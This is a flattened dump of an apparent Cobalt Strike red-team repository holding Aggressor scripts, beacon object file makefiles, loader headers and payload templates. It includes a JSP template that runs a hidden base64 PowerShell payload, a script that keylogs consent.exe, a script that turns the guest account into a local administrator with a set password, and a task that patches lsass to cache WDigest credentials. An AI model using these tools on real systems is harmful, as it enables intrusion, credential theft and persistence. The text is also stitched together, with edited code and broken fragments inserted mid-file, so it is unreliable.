bin: 6 | mkdir bin 7 | 8 | bin/loader.x64.o: bin 9 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/loader.c -o bin/loader.x64.o 10 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/proxy.c -o bin/proxy.x64.o 11 | $(CC_64) -DWIN_X64 -shared -Wall -Wno-pointer-arith -c src/hook.c -o bin/hook.x64.o 12 | 13 | 
clean: 14 | rm -f bin/* 15 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/checkin_jobs_context.cna: -------------------------------------------------------------------------------- 1 | #author bluescreenofjeff 2 | 3 | #adds context menu options to run "checkin" or "jobs" on Beacon session to help detect stale beacons in bulk 4 | 5 | 6 | #context menu building 7 | popup beacon_bottom { 8 | menu "Checkin"{ 9 | item 'Run "checkin"' { 10 | binput($1, "checkin"); 11 | bcheckin($1); 12 | } 13 | item 'Run "jobs"' { 14 | binput($1, "jobs"); 15 | bjobs($1); 16 | } 17 | } 18 | } 19 | 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/checkin_jobs_context.cna: -------------------------------------------------------------------------------- 1 | #author bluescreenofjeff 2 | 3 | #adds context menu options to run "checkin" or "jobs" on Beacon session to help detect stale beacons in bulk 4 | 5 | 6 | #context menu building 7 | popup beacon_bottom { 8 | menu "Checkin"{ 9 | item 'Run "checkin"' { 10 | binput($1, "checkin"); 11 | bcheckin($1); 12 | } 13 | item 'Run "jobs"' { 14 | binput($1, "jobs"); 15 | bjobs($1); 16 | } 17 | } 18 | } 19 | 20 | -------------------------------------------------------------------------------- /Cobatl Strike/BOF SprayAD/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | BOF := SprayAD 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | STRIP_x64 := x86_64-w64-mingw32-strip 4 | CC_x86 := i686-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | 7 | all: 8 | $(CC_x64) -o ../$(BOF).x64.o -c $(BOF).c 9 | $(STRIP_x64) --strip-unneeded ../$(BOF).x64.o 10 | $(CC_x86) -o ../$(BOF).x86.o -c $(BOF).c 11 | $(STRIP_x86) --strip-unneeded ../$(BOF).x86.o 12 | 13 | clean: 14 | rm ../$(BOF).x64.o 15 | rm ../$(BOF).x86.o 16 | 
// Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0836
//
// Patch-presence check for CVE-2019-0836. Prints a finding when the OS release id
// is 1809 and update "4493509" is not present in installedUpdates.
// Takes no arguments and returns nothing; the only output is the console line.
//
// NOTE(review): the check looks for this single update id only. If installedUpdates
// lists just the most recent cumulative update, a host patched by a later rollup
// would presumably still be flagged -- treat a hit as a prompt to verify the patch
// level, not as proof of exposure. Confirm how installedUpdates is populated.
void CVE_2019_0836() {
	const int releaseId = osReleaseId();

	// Only release 1809 is evaluated; every other release id is left unreported.
	if (releaseId != 1809) {
		return;
	}

	const bool updateListed =
		std::find(installedUpdates.begin(), installedUpdates.end(), "4493509") != installedUpdates.end();
	if (updateListed) {
		return;
	}

	std::cout << "\n\t [!] Vulnerable for CVE-2019-0836 Windows Elevation of Privilege Vulnerability" << "\n";
}
Vulnerable for CVE-2019-0841 Windows Elevation of Privilege Vulnerability" << "\n"; 8 | } 9 | } 10 | } -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Resource.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /Loader/BOF Loader/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "bof-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [dependencies] 8 | encoding = "0.2.33" 9 | [dependencies.windows-sys] 10 | version = "0.52" 11 | features = [ 12 | "Win32_Foundation", 13 | "Win32_Security", 14 | "Win32_System_Memory", 15 | "Win32_System_Threading", 16 | "Win32_System_LibraryLoader", 17 | ] 18 | -------------------------------------------------------------------------------- /Cobatl Strike/RDP Thief/RdpThief/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files 12 | #include 13 | 14 | 15 | 16 | // reference additional headers 
your program requires here 17 | -------------------------------------------------------------------------------- /VYSEC/auto-keylog-consent.cna: -------------------------------------------------------------------------------- 1 | 2 | sub keylognow { 3 | bps($1, lambda({ 4 | local('$pid $name $entry'); 5 | foreach $entry (split("\n", $2)) { 6 | ($name, $null, $pid, $arch) = split("\\s+", $entry); 7 | if ($name eq "consent.exe") { 8 | [$callback: $1, $pid, $arch]; 9 | } 10 | } 11 | }, $callback => $2)); 12 | } 13 | 14 | alias keylog-consent { 15 | btask($1, "Tasked Beacon to find consent.exe and keylog it"); 16 | keylognow($1, { 17 | bkeylogger($1, $2, $3); 18 | }); 19 | } -------------------------------------------------------------------------------- /Cobatl Strike/StartWebClient/SOURCE/StartWebClient.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | //ADVAPI32 6 | DECLSPEC_IMPORT ULONG EVNTAPI ADVAPI32$EventRegister(LPCGUID ProviderId, PENABLECALLBACK EnableCallback, PVOID CallbackContext, PREGHANDLE RegHandle); 7 | DECLSPEC_IMPORT ULONG EVNTAPI ADVAPI32$EventWrite(REGHANDLE RegHandle, PCEVENT_DESCRIPTOR EventDescriptor, ULONG UserDataCount, PEVENT_DATA_DESCRIPTOR UserData); 8 | DECLSPEC_IMPORT ULONG EVNTAPI ADVAPI32$EventUnregister(REGHANDLE RegHandle); 9 | -------------------------------------------------------------------------------- /Cobatl Strike/DllComHijacking/dllcomhijacking.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | //InstantiateCOMObject 4 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit); 5 | DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void); 6 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, COSERVERINFO *pServerInfo, DWORD dwCount, MULTI_QI *pResults); 7 | DECLSPEC_IMPORT HRESULT WINAPI 
OLE32$CLSIDFromString(LPCOLESTR lpsz, LPCLSID pclsid); -------------------------------------------------------------------------------- /Loader/Titan Ldr/hooks/DnsQuery_A.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | /*! 14 | * 15 | * Purpose: 16 | * 17 | * Redirects DnsQuery_A over a DNS/HTTP(s) 18 | * provider. 19 | * 20 | !*/ 21 | 22 | D_SEC( D ) DNS_STATUS WINAPI DnsQuery_A_Hook( _In_ PCSTR pszName, _In_ WORD wType, _In_ DWORD Options, _In_ PVOID pExtra, _Out_ PDNS_RECORD * ppQueryResults, _In_ PVOID pReserved ); 23 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/args.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | typedef struct 4 | { 5 | PAPI pApi; 6 | PCHAR pPipeName; 7 | PCHAR pDesktopName; 8 | SHORT port; 9 | HANDLE log; 10 | ULONG_PTR gdiplusToken; 11 | COLORREF color; 12 | ULONG quality; 13 | HDESK hDesktop; 14 | BITMAPINFO bmpInfo; 15 | PBYTE pPixels; 16 | PBYTE pOldPixels; 17 | PBYTE pTempPixels; 18 | 19 | } ARGS, *PARGS; 20 | -------------------------------------------------------------------------------- /Cobatl Strike/offsecginger/custom_payload_generator/templates/jsp_template.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.io.*" %> 2 | <% 3 | try { 4 | Process p = Runtime.getRuntime().exec("powershell -exec bypass -noni -nop -c \"$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('%%DATA%%'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\""); 5 | } 6 | catch(IOException e) { 7 | e.printStackTrace(); 8 | } 9 | %> 10 | 11 | 
-------------------------------------------------------------------------------- /Cobatl Strike/Venoma/Kobra/Ven.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | // Functions definitions 6 | std::vector Download(LPCWSTR baseAddress, LPCWSTR filename); 7 | DWORD GetPID(); 8 | void fresh_unhooking(); 9 | void perunsfart_unhooking(); 10 | void evt_patch(); 11 | 12 | void EnumPageExec(); 13 | void Indirect_RawExec_ppid(DWORD exPID); 14 | void IndirectAPC(); 15 | void IndirectRemoteAPC(DWORD exPID); 16 | void execArtifact(DWORD exPID); 17 | 18 | BOOL DeleteSelf(); 19 | 20 | 21 | -------------------------------------------------------------------------------- /Profile/Malleable Profiles/rich_header.py: -------------------------------------------------------------------------------- 1 | #rich header 2 | 3 | import random 4 | 5 | def generate_junk_assembly(length): 6 | return ''.join([chr(random.randint(0, 255)) for _ in range(length)]) 7 | 8 | def generate_rich_header(length): 9 | rich_header = generate_junk_assembly(length) 10 | rich_header_hex = ''.join([f"\\x{ord(c):02x}" for c in rich_header]) 11 | return rich_header_hex 12 | 13 | #generate a number of assembly opcodes (4-byte aligned) 14 | print(generate_rich_header(random.randint(5,20) * 4)) 15 | -------------------------------------------------------------------------------- /Cobatl Strike/BOF RunPe/Makefile: -------------------------------------------------------------------------------- 1 | #Makefile 2 | 3 | CCX64 = x86_64-w64-mingw32-gcc 4 | LDX64 = x86_64-w64-mingw32-ld 5 | 6 | CFLAGS = -w -Os -s -m64 -masm=intel -fno-builtin -fno-jump-tables 7 | 8 | TEMP_PATH = Bin/temp 9 | 10 | draugr: 11 | @ nasm -f win64 Src/Stub.s -o $(TEMP_PATH)/Stub.o 12 | @ $(CCX64) -c Src/Bof.c $(CFLAGS) -o $(TEMP_PATH)/Bof.o 13 | @ $(CCX64) -c Src/Draugr.c $(CFLAGS) -o $(TEMP_PATH)/Draugr.o 14 | @ $(LDX64) --allow-multiple-definition -r 
$(TEMP_PATH)/*.o -o Bin/runpe.o 15 | @ echo "[*] BOF Ready " 16 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/Titan.cna: -------------------------------------------------------------------------------- 1 | ## 2 | ## Reflective Loader 3 | ## 4 | ## GuidePoint Security LLC 5 | ## 6 | ## Threat and Attack Simulation 7 | ## 8 | 9 | ## 10 | ## Inserts titan into Beacon 11 | ## 12 | set BEACON_RDLL_GENERATE { 13 | 14 | $hnd = openf( script_resource( "Titan.". $3 .".bin" ) ); 15 | $ldr = readb( $hnd, -1 ); 16 | closef( $hnd ); 17 | 18 | if ( strlen( $ldr ) == 0 ) { 19 | warn( 'titan has not been compiled, using standard cobalt loader.' ); 20 | return $null; 21 | }; 22 | 23 | return $ldr . $2; 24 | }; 25 | -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP/headers/exploit_checks/CVE_2020_0796.h: -------------------------------------------------------------------------------- 1 | //https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796 2 | void CVE_2020_0796() { 3 | int osRID = osReleaseId(); 4 | 5 | if ((osRID == 1903) or (osRID == 1909)) { 6 | if (std::find(installedUpdates.begin(), installedUpdates.end(), "4551762") == installedUpdates.end()) { 7 | std::cout << "\n\t [!] 
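#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import sys


def hash_string( string ):
    """Return a 32-bit, case-insensitive hash of ``string``.

    The input is upper-cased, then folded with ``h = h * 33 + ord(ch)``
    starting from 5381, and the result is truncated to 32 bits.

    Args:
        string: text to hash. Anything that cannot be upper-cased and
            iterated as characters is rejected.

    Returns:
        The hash as an int in ``[0, 0xFFFFFFFF]``, or ``None`` when the
        input is not usable text (same result the original gave for bad
        input).

    NOTE(review): presumably this mirrors the loader's own hashing routine
    (Common.h includes "Hash.h"), so it can also be used to map a hash
    constant seen in a binary back to a name -- confirm against that header.
    Characters outside ASCII hash by code point here; whether the native
    side hashes bytes instead cannot be told from this file.
    """
    try:
        value = 5381
        for ch in string.upper():
            # Masking every round gives the same result as masking once at
            # the end (arithmetic is modulo 2**32) and keeps the int small.
            value = ((value << 5) + value + ord(ch)) & 0xFFFFFFFF
        return value
    except (AttributeError, TypeError):
        # Only the "not text" failures are absorbed; the original bare
        # `except` also swallowed KeyboardInterrupt and SystemExit.
        return None


# `==`, not `in`: the original substring test is also true for any module
# name that happens to be a substring of '__main__'.
if __name__ == '__main__':
    try:
        print('0x%x' % hash_string(sys.argv[1]))
    except IndexError:
        print('usage: %s [string]' % sys.argv[0])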
".o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | beacon_inline_execute($bid, $data, "go", $null); 17 | } 18 | -------------------------------------------------------------------------------- /Cobatl Strike/WdToggle/WdToggle_bof.s1.py: -------------------------------------------------------------------------------- 1 | from typing import List, Tuple 2 | 3 | from outflank_stage1.implant import ImplantArch 4 | from outflank_stage1.task.base_bof_task import BaseBOFTask 5 | from outflank_stage1.task.enums import BOFArgumentEncoding 6 | 7 | 8 | class WdToggleBOF(BaseBOFTask): 9 | def __init__(self): 10 | super().__init__("WdToggle", supported_architectures=[ImplantArch.INTEL_X64]) 11 | self.parser.description = "Patch lsass to enable WDigest credential caching and to circumvent Credential Guard (if enabled)." 12 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Auto/auto-sleep-after-initial-access.cna: -------------------------------------------------------------------------------- 1 | #Author: @nickvourd 2 | on beacon_initial { 3 | local('$bid'); 4 | $bid = $1; 5 | 6 | #Change your sleep time according to your preference 7 | #bsleep Arguments: 8 | #$1 - the ID for the beacon. This may be an array or a single ID. 9 | #$2 - the number of seconds between beacons. 
10 | #$3 - the jitter factor [0-99] 11 | bsleep($1, 130, 10); 12 | 13 | blog($1, "Setting sleep interval to 2 minutes 10 seconds with 10% jitter"); 14 | } 15 | -------------------------------------------------------------------------------- /threatexpress/beacon_webview/notes.md: -------------------------------------------------------------------------------- 1 | # D3 Notes 2 | 3 | Arrows and Labels 4 | 5 | http://bl.ocks.org/fancellu/2c782394602a93921faff74e594d1bb1 6 | https://gist.github.com/satomacoto/3384995 7 | 8 | 9 | D3 force simulation, curved edges and hover interaction (Data: Twitter mentions between members of the Welsh Assembly) 10 | 11 | https://bl.ocks.org/martinjc/7aa53c7bf3e411238ac8aef280bd6581 12 | 13 | 14 | Tooltips 15 | 16 | http://www.d3noob.org/2013/01/adding-tooltips-to-d3js-graph.html 17 | 18 | Font Awesome 19 | 20 | https://fontawesome.com/cheatsheet -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/guest-to-admin.cna: -------------------------------------------------------------------------------- 1 | sub guest_local_admin { 2 | #enable account 3 | bshell($1, 'net user guest /active:yes'); 4 | 5 | #set guest's password to CCDCsAccount99 6 | bshell($1, 'net user guest CCDCsAccount99'); 7 | 8 | #add guest to local administrators group 9 | bshell($1, 'net localgroup administrators guest /add'); 10 | } 11 | 12 | popup beacon_top { 13 | item "Guest Acct Local Admin" { 14 | local('$bid'); 15 | foreach $bid ($1) { 16 | guest_local_admin($bid); 17 | } 18 | } 19 | } -------------------------------------------------------------------------------- /Cobatl Strike/Portscan BOF/def_file_gen/cmon.py: -------------------------------------------------------------------------------- 1 | with open("./all.h") as fh: 2 | for l in fh.readlines(): 3 | l=l.strip("\n").replace("\t", " ") 4 | 5 | # ignore comments and empty lines 6 | if (not len(l) or l[0] == "/"): 7 | continue 8 | 9 | # 
DECLSPEC_IMPORT WINBOOL WINAPI VERSION$VerQueryValueA(LPCVOID pBlock, LPCSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen); 10 | 11 | f = l.split("(")[0].strip().split(" ")[-1] 12 | c = f.split("$")[1] 13 | print(f"{c}\t{f}\t{l}") 14 | 15 | 16 | -------------------------------------------------------------------------------- /Cobatl Strike/Sharp Zero Logon/SharpZeroLogon.csproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | fr-FR 11 | false 12 | 13 | -------------------------------------------------------------------------------- /Loader/AceLdr/src/util.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | SECTION( E ) UINT32 HashString( PVOID buffer, ULONG size ); 4 | SECTION( E ) PVOID FindModule( ULONG hash, PPEB peb, PULONG size ); 5 | SECTION( E ) VOID LdrProcessIat( PVOID image, PVOID directory ); 6 | SECTION( E ) VOID LdrProcessRel( PVOID image, PVOID directory, PVOID imageBase ); 7 | SECTION( E ) VOID LdrHookImport( PVOID image, PVOID directory, ULONG hash, PVOID function ); 8 | SECTION( E ) PVOID FindFunction( PVOID image, ULONG hash ); 9 | SECTION( E ) PVOID FindGadget( LPBYTE module, ULONG size ); 10 | 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/recon/app_count/Makefile: -------------------------------------------------------------------------------- 1 | CC_x64=x86_64-w64-mingw32-gcc 2 | CC_x86=i686-w64-mingw32-gcc 3 | CFLAGS=-c -fno-builtin -fno-builtin-memset -fno-builtin-memcpy -fno-builtin-memmove -fno-asynchronous-unwind-tables -fno-unwind-tables -fno-stack-protector -fno-stack-check -mno-stack-arg-probe -Os 4 | 5 | TARGET := applications_enum 6 | 7 | all: $(TARGET).x86.o $(TARGET).x64.o 8 | 9 | $(TARGET).x86.o: $(TARGET).c 10 | $(CC_x86) $(CFLAGS) -o $@ $< 11 | 12 | $(TARGET).x64.o: $(TARGET).c 13 | $(CC_x64) $(CFLAGS) -o $@ $< 14 | 15 | 
clean: 16 | rm -f *.o 17 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "macros.h" 10 | #include "../shared/native.h" 11 | #include "../shared/config.h" 12 | #include "hashes.h" 13 | #include "bapi.h" 14 | #include "util.h" 15 | #include "bfmain.h" 16 | #include "api.h" 17 | #include "args.h" 18 | #include "types.h" 19 | #include "scmain.h" 20 | #include "pipe.h" 21 | 22 | extern ULONG_PTR GetIp( VOID ); 23 | extern ULONG_PTR Leave( VOID ); 24 | -------------------------------------------------------------------------------- /Cobatl Strike/Psc/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Psk/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | 
$(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Psm/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Psw/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Psx/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | 
CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/morph HTA/banner.txt: -------------------------------------------------------------------------------- 1 | ███╗ ███╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ██╗████████╗ █████╗ 2 | ████╗ ████║██╔═══██╗██╔══██╗██╔══██╗██║ ██║ ██║ ██║╚══██╔══╝██╔══██╗ 3 | ██╔████╔██║██║ ██║██████╔╝██████╔╝███████║█████╗███████║ ██║ ███████║ 4 | ██║╚██╔╝██║██║ ██║██╔══██╗██╔═══╝ ██╔══██║╚════╝██╔══██║ ██║ ██╔══██║ 5 | ██║ ╚═╝ ██║╚██████╔╝██║ ██║██║ ██║ ██║ ██║ ██║ ██║ ██║ ██║ 6 | ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ 7 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #pragma warning(disable:4996) 14 | 15 | 16 | // TODO: reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /Cobatl Strike/Askcreds/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | 
OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/KerbHash/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Klist/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm 
../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Lapsdump/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/ReconAD/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | all: $(OBJS) 10 | 11 | %.o: %.c 12 | $(CC_x64) $(CFLAGS) -o ../$*.x64.o -c $< 13 | $(STRIP_x64) --strip-unneeded ../$*.x64.o 14 | 15 | $(CC_x86) $(CFLAGS) -o ../$*.x86.o -DWOW64 -fno-leading-underscore -c $< 16 | $(STRIP_x86) --strip-unneeded ../$*.x86.o 17 | 18 | clean: 19 | rm ../*.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Smbinfo/SOURCE/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.o, $(SRC)) 3 | CC_x86 := i686-w64-mingw32-gcc 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | CFLAGS := -masm=intel 8 | 9 | 